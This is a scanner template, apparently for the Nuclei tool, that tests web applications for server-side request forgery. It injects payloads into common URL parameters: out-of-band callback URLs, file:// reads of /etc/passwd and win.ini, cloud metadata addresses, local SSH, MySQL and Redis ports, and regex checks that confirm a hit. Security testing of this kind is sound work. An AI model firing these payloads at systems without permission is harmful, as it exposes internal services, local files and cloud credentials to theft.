id: response-ssrf info: name: Full Response SSRF Detection author: pdteam,pwnhxl,j4vaovo severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py tags: ssrf,dast,fuzz http: - method: GET path: - "{{BaseURL}}" payloads: ssrf: - 'http://{{interactsh-url}}' - 'http://{{FQDN}}.{{interactsh-url}}' - 'http://{{RDN}}.{{interactsh-url}}' - 'file:////./etc/./passwd' - 'file:///c:/./windows/./win.ini' - 'http://metadata.tencentyun.com/latest/meta-data/' - 'http://100.100.100.200/latest/meta-data/' - 'http://169.254.169.254/latest/meta-data/' - 'http://169.254.169.254/metadata/v1' - 'http://127.0.0.1:22' - 'http://127.0.0.1:3306' - 'dict://127.0.0.1:6379/info' fuzzing: - part: query mode: single keys: - callback - continue - data - dest - dir - domain - feed - file - host - html - imgurl - navigation - next - open - out - page - path - port - redirect - reference - return - show - site - to - uri - url - val - validate - view - window fuzz: - "{{ssrf}}" - part: query mode: single values: - "(https|http|file)(%3A%2F%2F|://)(.*?)" fuzz: - "{{ssrf}}" stop-at-first-match: true matchers-condition: or matchers: - type: word part: body words: - "Interactsh Server" - type: regex part: body regex: - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' - type: regex part: body regex: - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' - type: regex part: body regex: - '(\d.\d.\d)(.*?)mysql_native_password' - type: regex part: body regex: - 'root:.*?:[0-9]*:[0-9]*:' - type: word part: body words: - 'for 16-bit app support' - type: regex part: body regex: - 'dns-conf\/[\s\S]+instance\/' - type: regex part: body regex: - 'app-id[\s\S]+placement\/' - type: regex part: body regex: - 'ami-id[\s\S]+placement\/' - type: regex part: body regex: - 'id[\s\S]+interfaces\/'